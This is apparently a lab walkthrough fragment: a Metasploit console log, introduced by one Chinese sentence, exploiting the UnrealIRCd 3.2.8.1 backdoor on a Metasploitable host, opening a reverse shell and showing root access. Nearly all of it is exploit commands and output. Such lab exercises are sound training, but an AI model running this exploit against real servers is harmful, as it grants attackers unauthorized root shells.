该版本的ircd包含后门, 可直接被利用.
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 6667 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(unreal_ircd_3281_backdoor) > run
[*] Started reverse double handler
[*] Connected to 192.168.1.111:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Dzh85Re35U3dzZFy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Dzh85Re35U3dzZFy\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.113:4444 -> 192.168.1.111:33687) at 2014-08-01 00:06:03 -0400
id
uid=0(root) gid=0(root)
^C
Abort session 2? [y/N] y
[*] 192.168.1.111 - Command shell session 2 closed. Reason: User exit